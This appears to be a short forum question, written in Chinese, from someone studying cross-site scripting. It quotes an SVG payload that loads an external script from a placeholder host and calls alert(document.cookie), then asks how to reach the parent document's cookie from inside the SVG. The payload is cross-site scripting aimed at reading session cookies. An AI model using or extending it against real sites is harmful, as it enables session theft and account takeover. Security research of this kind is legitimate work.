我正在研究 XSS。我知道 HTML SVG 对象存在漏洞
来源在这里
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0" id="xss"><script type="text/ecmascript" xlink:href="http://blahblahblah.com/~blah/xss/xss.js"></script></svg>
我在 xss.js 中试过这个
alert(document.cookie);
但 cookie 的值是“未定义的”
SVG 对象中有 Document 对象,但这与 HTML Document 对象不同。
那么,如何获取 cookie 的父文档对象?
请帮忙。
谢谢阅读。